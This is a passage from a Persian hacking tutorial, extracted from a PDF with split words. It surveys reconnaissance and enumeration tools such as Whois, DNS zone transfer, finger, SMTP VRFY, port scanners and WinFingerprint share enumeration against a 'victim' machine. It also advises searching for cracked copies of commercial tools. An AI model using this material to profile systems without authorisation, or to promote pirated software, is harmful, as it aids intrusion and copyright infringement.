ﺏﺎﺷﺪ :
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١٦
: Whios -١ﺏﻪ ﻃﻮر ﻣﺴﺘﻘﻴﻢ ﺏﺎ ﺱﺮویﺲ دهﻨﺪﻩ Whiosارﺕﺒﺎط ﺏﺮﻗﺮار ﮐﺮدﻩ و اﻃﻼﻋﺎت ﺏﺪرد ﺏﺨﻮر را ﻣﻴﮕﻴ ﺮد .ﭼ ﻮن از ﺱ ﺎیﺖ ﺧ ﻮدش ﺏ ﺮای ﺟﺴﺘﺠﻮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ﻧﻴﺎزی ﺏﻪ دﺱﺖ ﮐﺎری ﻧﺪارد. : IP Block Whios -٢ﻗﺎدر اﺱﺖ ﺕﻌﻴﻴﻦ ﮐﻨﺪ ﮐﻪ یﮏ ﻣﺠﻤﻮﻋﻪ IPﻣﺘﻌﻠﻖ ﺏﻪ ﮐﺪام ﺷﺮﮐﺖ یﺎ ﻣﻮﺱﺴﻪ اﺱﺖ . : Ping -٣ﺏﺮای ﮐﺸﻒ IPﻗﺮﺏﺎﻧﯽ از ﺁن اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد اﻟﺒﺘﻪ اﮔﺮ ﺁن ﻣﺎﺷﻴﻦ ﻓﻌﺎل ﺏﺎﺷﺪ. : DNS Zone Transfer -۴هﻤﺎﻧﻄﻮر ﮐﻪ در ﺏﺎﻻ اﺷﺎرﻩ ﺷﺪ ﺏﺎﻋﺚ اﻧﺘﻘﺎل ﺕﻤﺎم رﮐﻮرد هﺎی ﻣﻮﺟﻮد در ﺁن ﻣﻴﺸﻮد ) .ﺏﺎی ﺪ ﺁدرس DNSرا ﺏﺪهﻴ ﺪ ﺏﻪ ﺏﺮﻧﺎﻣﻪ (. : Nslookup -۵ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﺧﻮدﺕﺎن دﺱﺘﯽ ﺏﺎ ﺁن ) ( DNSﻓﻌﻞ اﻧﻔﻌﺎل داﺷﺘﻪ ﺏﺎﺷﺪ. :« DIG -۶در ﺏﺎرﻩ یﮏ ﺱﻴﺴﺘﻢ ﺧﺎص از DNSاﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ ﻣﻴﮕﻴﺮد . : Trace route -٧ایﻦ یﮑﯽ ﻓﻬﺮﺱﺘﯽ از ﻣﺴﻴﺮیﺎب هﺎ و ﮐﻼ ﻣﺎﺷﻴﻦ هﺎی ﺏﻴﻦ ﺷﻤﺎ و ﻣﺎﺷﻴﻦ هﺪف را از ﺟﻤﻠﻪ دیﻮار ﺁﺕﺶ ﭘﺮﮐﺴﯽ و ...را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ . : Finger -٨اﮔﺮ ﺱﺮویﺴﯽ ﺏﻪ هﻤﻴﻦ ﻧﺎم روی ﻣﺎﺷﻴﻦ هﺪف ﻓﻌﺎل ﺏﺎﺷﺪ ﺏﺎ اﺟﺮای ایﻦ ﻣﻴﺘﻮاﻧﻴﺪ ﻟﻴﺴﺘﯽ از ﮐﺎرﺏﺮ هﺎی ﺁن را ﺏﺒﻴﻨﻴﺪ. : SMTP VRFY -٩ﻣﻴﺘﻮان ﻓﻬﻤﻴﺪ ﮐﻪ ﻣﺜﻼ ﻓﻼن ﺁدرس ﭘﺴﺘﯽ روی ﺱﺮویﺲ دهﻨﺪﻩ وﺟﺪ دارد یﺎ ﮐﻪ ﺧﻴﺮ . : Web Browser -١٠یﮏ ﻣﺮور ﮔﺮ وب یﺎ ﺏﻪ اﺻﻄﻼﺡﯽ ﮐﺎوﺷﮕﺮ ﺷ ﺒﮑﻪ اﺱ ﺖ ﮐ ﻪ اﻟﺒﺘ ﻪ ﺻ ﻔﺤﺎت را ﺏ ﻪ زﺏ ﺎن HTMLو ﻓﺮایﻨ ﺪ ﺁن ﻧﻤ ﺎیﺶ ﻣﻴﺪهﺪ. : Net Info -٢
ﻧﺮم اﻓﺰار ﺕﺠﺎری اﺱﺖ وﻟﯽ وﻗﺘﯽ اﺱﻢ ﺁن را +واژﻩ CRACKدر ﻣﻮﺕﻮر هﺎی ﺟﺴﺘﺠﻮ وارد ﮐﻨﻴﺪ ﻣﺸﮑﻞ ﺕﺠﺎری ﺏﻮدﻧﺶ ﺡﻞ ﻣﯽ ﺷﻮد. ﻧﺴﺒﺖ ﺏﻪ ﻧﺮم اﻓﺰار SAM SPADEیﮏ ﺱﺮی ﭼﻴﺰ ﺏﻴﺸﺘﺮ و یﮏ ﺱﺮی ﮐﻤﺘﺮ دارد.دارای ﻗﺎﺏﻠﻴﺘﻬﺎی زیﺮ ﻣﯽ ﺏﺎﺷﺪ : : Local Info -١هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﻌﻨﯽ واژﻩ و ﻋﮑﺲ ﻣﻴﺒﻴﻨﻴﺪ یﮏ ﺱﺮی اﻃﻼﻋﺎت درﺏﺎرﻩ ﻣﺎﺷﻴﻨﯽ ﮐﻪ روش ﻧﺮم اﻓﺰار اﺟﺮا ﻣﻴﮑﻨ ﻴﻢ ﺏ ﻪ ﻣ ﺎ ﻣﻴﺪه ﺪ . ﻣﺜﻼ :ﻧﺎم ﮐﺎرﺏﺮ ،ﺁدرس IPﻣﺎﺷﻴﻦ ،ﻧﺴﺨﻪ WIN Sockو ﻣﺸﺨﺼﺎت ﺁن ) ﺁﻧﻬﺎیﯽ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺴﯽ ﺕﺤﺖ ﺷﺒﮑﻪ ﺏﺎ C/C++ﻣﻴﮑﻨﻨﺪ ﻣﻴﺪاﻧﻨﺪ ﭼﯽ هﺴﺖ ، (.ﺡﺎﻟﺖ ﺱﻴﺴﺘﻢ ﺕﻌﺪاد ﺱﻮﮐﺖ هﺎی ﺁزاد ،اﻧﺪازﻩ ﺏﺴﺘﻪ هﺎی . UDP : Connection -٢ﻣﺸﺨﺼﺎت ﺕﻤﺎم ارﺕﺒﺎط TCPو ﭘﻮرت هﺎی ﺏﺎز UDPو ﺡﺎﻟﺖ ارﺕﺒﺎﻃﯽ ﻣﻮﺟﺪ را ﻧﺸﺎن ﻣﻴﺪهﺪ. : PING -٣دﻗﻴﻘﺎ ﻣﺜﻞ SAM SPADEاﺱﺖ ﮐﺎرش . : TRACE -۴دﻗﻴﻘﺎ ﻣﺜﻞ ﮔﺰیﻨﻪ Nslookupدر ﻧﺮم اﻓﺰار SAM SPADEاﺱﺖ ﮐﺎرش . : Lookup -۵دﻗﻴﻘﺎ ﻣﺜﻞ SAM SPADEاﺱﺖ ﮐﺎرش . : Finger -۶دﻗﻴﻘﺎ ﻣﺜﻞ SAM SPADEاﺱﺖ ﮐﺎرش . : Whois -٧دﻗﻴﻘﺎ ﻣﺜﻞ SAM SPADEاﺱﺖ ﮐﺎرش . : Day Time -٨ایﻦ یﮑﯽ ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﮐﻪ ﺱﺎﻋﺖ و ﺕﺎریﺦ ﻣﺎﺷﻴﻦ هﺪف درﺻ ﻮرت اﺟ ﺮای ﺱﺮوی ﺴﯽ ﺏ ﻪ هﻤ ﻴﻦ ﻧ ﺎم را ﮐ ﺸﻒ ﮐﻨ ﺪ ) ﺏ ﺮای ﻓﻬﻤﻴ ﺪ ایﻨﮑﻪ ایﻦ ﻣﺎﺷﻴﻦ ﺕﻮ ﮐﺪام ﮐﺸﻮر اﺱﺖ اﻟﺒﺘ ﻪ اﺏ ﺰار ﮔﺮاﻓﻴﮑ ﯽ ﺏﻬﺘ ﺮی اﺱ ﺖ در ای ﻦ ﺏ ﺎرﻩ ﺏ ﺎ ﻧ ﺎم VISAL RUTORﮐ ﻪ ای ﻦ ﮐ ﺎر ﻣﻄﻤ ﺌﻦ ﺕ ﺮ اﻧﺠ ﺎم ﻣﻴﺪهﺪ (.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١٧
: Time -٩ﺏﺮای ﺏﺪﺱﺖ ﺁوردن زﻣﺎن از یﮏ ﺱﺮویﺲ دهﻨﺪﻩ ﻣﺸﺨﺺ ﮐﻪ اﻟﺒﺘﻪ ﮐﺎرﺏﺮ ﺏﺎیﺪ ﺁن را ﻣﺸﺨﺺ ﮐﻨﺪ. : HTML -١٠دﻗﻴﻘﺎ ﻣﺜﻞ ﮔﺰیﻨﻪ Web Browserدر ﻧﺮم اﻓﺰار SAM SPADEاﺱﺖ ﮐﺎرش . : Scanner -١١ایﻦ ﮔﺰیﻨﻪ را SAMهﻢ دارد ﮐﻪ ﺏﺮای ﭘﻴﺪا ﮐﺮدن ﻣﺎﺷﻴﻦ هﺎی ﻓﻌﺎل در یﮏ رﻧﺞ ﻣﺸﺨﺺ از IPﮐﻪ ﺧﻮدﺕﻮن ﺏﻬﺶ ﻣﯽ دهﻴﺪ. : Services -١٢یﮏ ﭼﻴﺰ ﺧﻴﻠﯽ ﺏﺪرد ﺏﺨﻮر اﺱﺖ ﺏ ﺎ ﮔ ﺮﻓﺘﻦ ﻧ ﺎم ﻣﺎﺷ ﻴﻦ از ﻣ ﺎ ﺱﺮوی ﺴﻬﺎی ﻣﻌ ﺮوف و ﺷ ﻨﺎﺧﺘﻪ ﺷ ﺪﻩ ای ﯽ را ﮐ ﻪ ﺁن ﻣﺎﺷ ﻴﻦ اراﺋ ﻪ ﻣﻴﺪهﺪ را ﭘﻴﺪا ﮐﺮدﻩ و ﺏﻪ ﻣﺎ ﻧﺸﺎن ﻣﻴﺪهﺪ. دیﮕﻪ هﻤﻴﻦ. : Net Scan Tools -٣
ﺧﻮب ایﻦ هﻢ ﺕﺠﺎری وﻟﯽ ﮐﺎرای ﺁن اﺱﻴﺪی و اﺱﺎﺱﯽ و درﺱﺖ ،ﻣﻦ ﻗﺒﻮل دارم ایﻦ ،اﻟﺒﺘﻪ از ﻧﻮع ﻧﺮم اﻓﺰارهﺎ زیﺎد هﺴﺖ یﮏ ﺟﻮر ﺁیﯽ ﺱﻠﻴﻘﻪ ای اﺱﺖ اﻟﺒﺘﻪ ﻣﻦ ﺁﻧﻬﺎیﯽ را ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﮐﻪ از ایﻦ هﻤﻪ ﺟﻮاب ﺧﻮد ﺷﺎن را درس ﭘﺲ دادﻩ ﺏﺎﺷﻨﺪ ﺧﻮب ﺏﺴﻪ ﺏﺮیﻢ ﺱﺮ ﮐﺎرﻣﺎن . ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ یﮏ راﺱﺖ ﺏﺮیﺪ در ﻗﺴﻤﺖ TOOLSﭼﻮن ﺏﻘﻴﻪ ﻣﻨﻮهﺎی ﺁن ﺏﺮای ﺕﺒﻠﻴﻎ اﺱﺖ.دارای ﮔﺰیﻨﻪ هﺎیﯽ ﻣﺎﻧﻨﺪ دو اﺏﺰار ﻗﺒﻠﯽ اﺱﺖ اﻣﺎ ﺏﺎ ای ﻦ ﺕﻔﺎوت ﮐﻪ ﮐﺎﻣﻞ ﺕﺮ و اﻟﺒﺘﻪ ﻗﻮی ﺕﺮ ) ﻣﻦ ﺏﺎ ﺕﺠﺮﺏﻪ ای ﮐﻪ دارم ﭼﻮن ﻣﺎ داریﻢ از یﮏ ﻧﺮم اﻓﺰار اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﺱ ﻌﯽ ﮐﻨﻴ ﺪ هﻤﻴ ﺸﻪ از ﺏ ﻪ روز ﺏ ﻮدن ﺁن ﻣﻄﻤﺌﻦ ﺏﺎﺷﻴﺪ ،دوﻣﺎ ﺱﻌﯽ ﮐﻨﻴﺪ هﻤﻴﺸﻪ یﮏ ﮐﺎر ﺏﺎ ﭼﻨﺪ ﻧﺮم اﻓﺰار ﻣﺨﺘﻠﻒ اﻧﺠﺎم ﺏﺪهﻴﺪ و ﻧﺘﻴﺠﻪ هﺎ را ﺏﺎ هﻢ ﻣﻘﺎیﺴﻪ ﮐﻨﻴﺪ زی ﺮا ه ﺮ ﮐ ﺪام در اﻧﺠ ﺎم یﮏ ﮐﺎری ﻗﻮی هﺴﺘﻦ ( ﮐﻪ ﻣﻦ از ﺕﻮﺽﻴﺢ ﺁﻧﻬﺎ ﺻﺮف ﻧﻈﺮ ﮐ ﺮدﻩ ام .اﻟﺒﺘ ﻪ ای ﻦ را اﺽ ﺎﻓﻪ ﮐ ﻨﻢ ای ﻦ ﺱ ﺮویﺲ ه ﺎ دیﮕ ﻪ ﻣﻨ ﺴﻮخ ﺷ ﺪﻩ و ه ﻴﭻ راهﺒ ﺮ ﺷﺒﮑﻪ ای ریﺴﮏ ﻧﻤﻴﮑﻨﺪ و ﺁﻧﻬﺎ را ﻓﻌﺎل ﺏﮕﺰارد ﻣﺜﻞ . Chargen ، Quote ، Daytime ، echo : ﮐﻠﻴﺪ هﺎی Database Testsو TimeSyncو Winsock Infoو NetBIOSهﻤﮕﯽ Localیﻌﻨﯽ ﻓﻘ ﻂ ﻧﺘ ﺎیﺞ ﺏ ﺮای ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﺷ ﻤﺎ اﺱ ﺖ را ﻧﺸﺎن ﻣﻴﺪهﺪ .ﮐﻪ اوﻟﯽ ) ( Database Testsﺱﺮویﺲ هﺎ و ﭘﻮرت هﺎی ﻣﺮﺏﻮﻃ ﻪ ه ﺮ ﮐ ﺪام را ﻧ ﺸﺎن ﻣﻴﺪه ﺪ و ...راﺡ ﺖ ﻣﻴﺘﻮاﻧﻴ ﺪ ﺏ ﺎ ﺁن ﺏ ﺎزی ﮐﻨﻴ ﺪ ﺕ ﺎ ﺏﻔﻬﻤﻴ ﺪ ﭼ ﻪ ﮐ ﺎر ﻣﻴﮑﻨ ﺪ .دوﻣ ﯽ ﺏ ﺮای ﺕﻐﻴﻴ ﺮ زﻣ ﺎن اﺱ ﺖ و ﺱ ﻮﻣﯽ را ﮐ ﻪ ﺏ ﺎﻻ ﮔﻔ ﺘﻢ ﭼ ﯽ ه ﺴﺖ و ﺁﺧ ﺮی اﻃﻼﻋ ﺎﺕﯽ در ﺏ ﺎرﻩ NetBIOS ﮐﺎﻣﭙﻴﻮﺕﺮ ﺏﻪ ﺷﻤﺎ ﻣﯽ دهﺪ .ﮐﻪ اﻟﺒﺘﻪ ﺷﻤﺎ هﻤﮕﯽ ایﻨﻬﺎ را ﻣﻴﺘﻮاﻧﻴﺪ دﺱﺖ ﮐﺎری ﮐﺮدﻩ و ﺏ ﻪ دﻟﺨ ﻮاﻩ و ی ﺎ ﺏﻨ ﺎ ﺏ ﻪ اﺡﺘﻴ ﺎج ﺧ ﻮد ﭘﻴﮑ ﺮ ﺏﻨ ﺪی ﮐﻨﻴ ﺪ .ﺏ ﺎ ﮐﻠﻴ ﺪ Launcherﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﭘﺮوﺕﮑﻞ اﻧﺘﺨﺎﺏﯽ ﺧﻮد ﺏﻪ هﺪف ﺧﻮد وﺻﻞ ﺷﻮیﺪ . ایﻦ ﺏﺮﻧﺎﻣﻪ ٣ﺕﺎ اﻣﮑﺎن ﻓﻮق ﺟﺬاب دارد ) زیﺎد ﺟﺪی ﻧﮕﻴﺮیﺪ ( ﺏﺎ ﻋﻨﻮان هﺎی Port Probeﮐﻪ از ﻧﺴﺨﻪ ۵ﺏﻪ ﺏﻌﺪ ﻧﻴﺴﺖ و Port Scanو TCP . TERM
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١٨
ﮔﺰیﻨﻪ دیﮕﺮی ﺏﺎ ﻧﺎم Net Scannerدارد ﮐﻪ اﻟﺒﺘﻪ ﻣﺜﻞ دو ﻧ ﺮم اﻓ ﺰار ﻗﺒﻠ ﯽ ﺏ ﺮای ﭘﻴ ﺪا ﮐ ﺮدن ﻣﺎﺷ ﻴﻦ ه ﺎی ﻓﻌ ﺎل در ی ﮏ رﻧ ﺞ ﻣ ﺸﺨﺺ IPاﺱ ﺖ. ﮔﺰیﻨﻪ Port Scannerﺏﺮای ﺟﺴﺘﺠﻮ ﮐﺮدن ﭘﻮرت هﺎی ﺏ ﺎز روی ﻣﺎﺷ ﻴﻦ ﻗﺮﺏ ﺎﻧﯽ اﺱ ﺖ اﻟﺒﺘ ﻪ دارای ﮐ ﺎرایﯽ ﺧ ﻮﺏﯽ اﺱ ﺖ ﺏﻌ ﺪ از nmapﻣﻴ ﺸﻮد ﮔﻔﺖ ﺏﻬﺘﺮیﻦ هﺴﺖ یﺎ ﻻاﻗﻞ ﺟﺰو ﺏﻬﺘﺮیﻦ هﺎ اﺱﺖ .ﻧﺘﺎیﺠﯽ را ﮐﻪ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ ﺏﺎ یﮏ ﻧﻤﺎد ﮐﻨﺎرش اﺱﺖ اﮔﺮ دای ﺮﻩ ﺱ ﺒﺰ ﻧ ﺸﺎن داد یﻌﻨ ﯽ ﭘ ﻮرت ﺏ ﺎز اﺱﺖ اﮔﺮ دایﺮﻩ ﺱﺒﺰ ﺏﺎ یﮏ ﺡﺮف bدر داﺧﻞ ﺁن ﻧﺸﺎن داد یﻌﻨﯽ ﭘﻮرت ﺏﺎز اﺱﺖ و اﻃﻼﻋﺎﺕﯽ از ﺱﺮویﺲ ﺏﺎز ﮐﻨﻨﺪﻩ ﭘﻮرت را هﻢ ﮐ ﺸﻒ ﮐ ﺮدﻩ ﺏﻘﻴ ﻪ ﻧﻤﺎد هﺎ هﻢ یﻌﻨﯽ ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ یﺎ ایﻨﮑﻪ دیﻮار ﺁﺕﺶ از دﺱﺘﺮﺱﯽ ﺏﻪ ﺁن ﺟﻠﻮ ﮔﻴﺮی ﮐﺮدﻩ اﺱﺖ . ﮔﺰیﻨﻪ ﺏﻌﺪی TCP TERMاﺱﺖ ﮐﻪ ﺏﺎ ﺁن ﻣﻴﺘﻮاﻧﻴﺪ ﺏﻪ یﮏ ﭘﻮرت ﺧﺎص وﺻﻞ ﺷﺪﻩ و ﻓﻌﻞ اﻧﻔﻌﺎل داﺷ ﺘﻪ ﺏﺎﺷ ﻴﺪ ﮐ ﻪ ﺧﻴﻠ ﯽ ﺧ ﻮب اﺱ ﺖ اﻟﺒﺘ ﻪ NCو Telnetهﻢ ایﻦ ﮐﺎر هﺎ را ﻣﻴﮑﻨﻨﺪ . : WS-Ping Pro Pack -۴
ایﻦ هﻢ ﻣﺜﻞ ٣ﻧﺮم اﻓﺰار ﻗﺒﻠﯽ ﮐﺎرایﯽ یﮏ ﺱﺎﻧﯽ دارد ﺕﺠﺎری اﺱﺖ اﻣﺎ ﻣﺜﻞ ﻗﺒﻠﯽ هﺎ ﮐﺮک زیﺎد دارد روی ﺕﻤﺎﻣﯽ ﻧ ﺴﺦ ویﻨ ﺪوز اﺟ ﺮا ﻣﻴ ﺸﻮد دارای ﮔﺰیﻨﻪ هﺎی زیﺮ اﺱﺖ : : Infoاﻃﻼﻋﺎت ﻣﻘﺪﻣﺎﺕﯽ در ﺏﺎرﻩ هﺪف ﺏﺪﺱﺖ ﻣﻴﺂورد از ﻗﺒﻴﻞ Whoisو DNSو ...اﻟﺒﺘﻪ اﮔﺮ ﻧﺎم را ﻣﻴﻨﻮیﺴﻴﺪ ﺏﺎی ﺪ ﮐﺎﻣ ﻞ ﺏﺎﺷ ﺪ یﻌﻨ ﯽ ﻧ ﺎم ﮐﺎﻣ ﻞ ﻣﺎﺷﻴﻦ ﺏﺎﺷﺪ .ﻧﻪ ﻣﺜﻼ WWW.xxx.comﻧﻨﻮیﺴﻴﺪ ﭼﻮن یﮑﻢ ﻣﺸﮑﻞ ﭘﻴﺶ ﻣﯽ ﺁیﺪ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﺁدرس IPرا وارد ﮐﻨﻴﺪ. : HTMLﻣﺜﻞ ﮔﺰیﻨﻪ هﺎی ﻣﺸﺎﺏﻪ ﺧﻮد ) ﮔﺰیﻨﻪ Web Browserدر ﻧﺮم اﻓ ﺰار SAM SPADEو ﮔﺰیﻨ ﻪ HTMLدر ﻧ ﺮم اﻓ ﺰار net info ( در دو ﻧ ﺮم اﻓ ﺰار ﺏ ﺎﻻی اﺱ ﺖ Ping.و Trace Routeو Look upو ...ﮐ ﺎﻣﻼ ﻣﺜ ﻞ و ﻣ ﺸﺎﺏﻪ ﻧ ﺮم اﻓ ﺰار ه ﺎیﯽ ﺏ ﺎﻻیﯽ اﺱ ﺖ ﮐ ﻪ ﺕﻮﺽ ﻴﺢ ﺁﻧﻬ ﺎ ﺻﺮف ﻧﻈﺮ ﻣﻴﮑﻨﻢ. ﺧﻮب ﺕﺎ ﺏﻪ ﺡﺎل یﮏ ﺱﺮی ﻧﺮم اﻓﺰار ﺷﻨﺎﺱﺎیﯽ ﻣﻘﺪﻣﺎﺕﯽ هﺪف را ﻣﻌﺮﻓﯽ ﮐﺮدم از ایﻦ ﺟﺎ ﺏﻪ ﺏﻌﺪ ﻣﻦ یﮏ ﺱﺮی ﻧ ﺮم اﻓ ﺰار ﻣﻌﺮﻓ ﯽ ﻣﻴﮑ ﻨﻢ ﺕ ﻮ هﻤ ﻴﻦ ﻣﺎیﻪ هﺎ !! : Rhino 9 Pinger یﮏ ﻧﺮم اﻓﺰار ﺏﺮای ﺕﺸﺨﻴﺺ ﺏﺎﻻ ﺏﻮدن ﻣﺎﺷﻴﻨﻬﺎی درون ﺷﺒﮑﻪ ﺏﺎ دادن یﮏ رﻧﺞ IPاﺱﺖ .دارای ﺱﺮﻋﺖ و دﻗﺖ زیﺎدی اﺱﺖ. : Visual Route یﮏ ﻧﺮم اﻓﺰار Trace routeاﺱﺖ ﮐﻪ ﮔﻔﺘﻢ ﭼﻪ ﮐﺎر ﻣﻴﮑﻨﻨﺪ ایﻦ ﻧﻮع ﻧﺮم اﻓﺰار ه ﺎ ای ﻦ یﮑ ﯽ ،ی ﮏ ﻣﺤ ﻴﻂ ﮔﺮاﻓﻴﮑ ﯽ دارد ﮐ ﻪ ﻣﻮﻗﻌﻴ ﺖ ﺕﻘﺮیﺒ ﯽ از ﻣﮑ ﺎن ﻣﺎﺷ ﻴﻦ ﺏ ﻪ ﻣ ﺎ ﻣﻴﺪه ﺪ ﻣ ﺜﻼ ﮐ ﺸﻮر و ﺷ ﻬﺮ.ﺁﺧ ﺮیﻦ ﻧ ﺴﺨﻪ اش ﻓﮑ ﺮ ﻣﻴﮑ ﻨﻢ ﻧ ﺴﺨﻪ ١٠ﺏﺎﺷ ﺪ ﮐ ﻪ ای ﻦ ﺷ ﮑﻠﯽ از ﺱ ﺎیﺖ ﺧ ﻮدش ﺏ ﺎ ﻧ ﺎم www.visualroute.comﻣﻴﺘﻮاﻧﻴﺪ ﺏﮕﻴﺮد .یﮏ ﺱﺮی ﻧﺮم اﻓﺰارهﺎی دیﮕﺮی هﻢ دارد ﮐﻪ اﮔﺮ ﺧﻮاﺱﺘﻴﺪ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﮕﻴﺮیﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١٩
اﻟﺒﺘﻪ ایﻦ ﻧﺴﺨﻪ 9.2aاﺱﺖ ﺏﺮای ١۵روز اول رایﮕﺎن اﺱﺖ. اﺏﺰارهﺎ ی ﺷﺮﮐﺖ : Necrosoft ﮐﻪ در ﻣﻮرد Whoisو DNSو Trace routeاﺱﺖ و ﺏﺴﻴﺎر ﺱﺎدﻩ و اﻟﺒﺘﻪ ﺏﺎ ﮐﺎرای ﺏﺎﻻ اﺱ ﺖ ﮐ ﻪ از ﺱ ﺎیﺖ ﺧ ﻮدش ﺏ ﺎ ﻧ ﺎم www.nscan.org ﻣﻴﺘﻮاﻧﻴﺪ دریﺎﻓﺖ ﮐﻨﻴﺪ.
اﺏﺰار : Win finger print یﮏ اﺏﺰار هﻤﻪ ﮐﺎرﻩ دیﮕﺮ ﮐﻪ ﺏﻪ ﺷﺪت در ﺡﺎل ﺕﻮﺱﻌﻪ اﺱﺖ اﺏﺰار Win finger printاﺱﺖ ﮐﻪ اﻟﺒﺘﻪ یﮏ اﺏﺰار ﻣﺘﻦ ﺏﺎز یﺎ ﺏﻪ اﺻ ﻄﻼﺡﯽ open Soursاﺱﺖ ﮐﻪ ﮐﺎﻣﻞ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﺁن را .اﻟﺒﺘﻪ ایﻦ در اول ﺏﺮای Linuxﺏﻮد وﻟﯽ ﺏﻌﺪا ﻧﺴﺨﻪ ویﻨﺪوز ﺁن ﺁﻣﺪ ﮐﻪ ﺟﺎﻟﺐ اﺱﺖ اﻟﺒﺘﻪ ﻣﯽ ﺕﻮاﻧﻴﺪ ﮐ ﺪ ﻣﻨﺒﻊ ﺁن را ﺧﻮدﺕﺎن ویﺮایﺶ ﮐﺮدﻩ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻧﻴﺎزﺕﺎن ﺏﻌﺪ ﺁن را ﮐﺎﻣﭙﺎیﻞ ﮐﻨﻴﺪ.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢٠
یﮏ ﭼﻴﺰ اول از هﻤﻪ ﺏﮕﻮیﻢ ﮐﻪ راﺏﻂ ﮐﺎرﺏﺮی ایﻦ ﺏﺮﻧﺎﻣﻪ ﻓﻘﻂ %٣۵از اﻣﮑﺎﻧﺎت ایﻦ ﺏﺮﻧﺎﻣﻪ را در اﺧﺘﻴﺎر ﺷﻤﺎ ﻣﻴﮕﺰارد. ایﻦ ﻧﺮم اﻓﺰار دارای یﮏ راﺏﻂ ﮐﺎرﺏﺮی ﻣﯽ ﺏﺎﺷﺪ ﮐﻪ ﻗﺴﻤﺖ Enumeration Optionﻓﻘﻂ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﭼ ﻮن ﮔﺰیﻨ ﻪ ه ﺎی دیﮕ ﺮ ﺁن ﺕ ﺎﺏﻠﻮ اﺱ ﺖ ﮐﺎرﺷﺎن !!! ﮔﺰیﻨﻪ اول ﮐﻪ ﻣﻌﻨﯽ واﺽﺢ ایﯽ دارد و ﺕﻤﺎم اﻣﮑﺎﻧﺎﺕﯽ را ﮐﻪ ﮔﺰیﻨﻪ ﺁن را هﻢ در ای ﻦ ﭘﻨﺠ ﺮﻩ وﺟ ﺪ ﻧ ﺪارد ه ﻢ ﺕ ﺴﺖ ﻣﻴﮑﻨ ﺪ وﻟ ﯽ ﮐﻨﺘﺮﻟ ﯽ روی ﺁﻧﻬﺎ ﻧﺪاریﺪ ﭘﺲ هﻴﭽﯽ !! وﻟﯽ ﺏﺪ ﻧﻴﺴﺖ ؟!؟!؟!؟ ﮔﺰیﻨﻪ Sharesدﻧﺒﺎل ﭼﻴﺰهﺎی ﺏﻪ اﺷﺘﺮاک ﮔﺬاﺷﺘﻪ ﺷﺪﻩ روی ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ ﻣﻴﮕﺮدد اﻟﺒﺘﻪ ﺏﺎیﺪ یﮑﯽ از ﭘﻮرت هﺎی ۴۴۵و یﺎ ١٣٩ﺏﺎز ﺏﺎﺷﺪ ﺕﺎ ﻧﺘﻴﺠﻪ ای داﺷﺘﻪ ﺏﺎﺷﺪ .یﮑﯽ از اﻣﮑﺎﻧﺎﺕﯽ ﮐﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ دارد و اﺕﻔﺎﻗﺎ ه ﻢ ﮐ ﺎرایﯽ ﺧ ﻮﺏﯽ دارد ﮔﺰیﻨ ﻪ Roleاﺱﺖ ﮐﻪ ﮐﺎرش ﺕﺸﺨﻴﺺ ﻧﻮع ﺱﺮور و ﺱﻴﺴﺘﻢ ﻋﺎﻣ ﻞ روی ﺁن ﺏ ﻪ هﻤ ﺮاﻩ ﺟﺰﺋﻴ ﺎت ﺧﻴﻠ ﯽ ﺧ ﻮب اﺱ ﺖ ﮐ ﻪ ﻣﺘﺎﺱ ﻔﺎﻧﻪ ﮔﺰیﻨ ﻪ ﺁن در ﻧ ﺴﺨﻪ ه ﺎی ﺟﺪیﺪ ﺡﺬف ﺷﺪﻩ و ﺷﻤﺎ ﺏﺎیﺪ ﺁن را از ﺧﻂ ﻓﺮﻣﺎن ﺏﻌﻼوﻩ ﺱﻮیﭻ ایﻦ ﮔﺰیﻨﻪ اﺟﺮا ﮐﻨﻴﺪ یﺎ ﮔﺰیﻨﻪ Allرا اﻧﺘﺨﺎب ﮐﻨﻴﺪ.اﻣﮑﺎن دیﮕﺮ Userدر ﻧﺴﺨﻪ هﺎی ﺟﺪیﺪ و در ﻧﺴﺨﻪ هﺎی ﻗ ﺪیﻢ USER NAMEاﺱ ﺖ ﮐ ﻪ ای ﻦ ﮔﺰیﻨ ﻪ 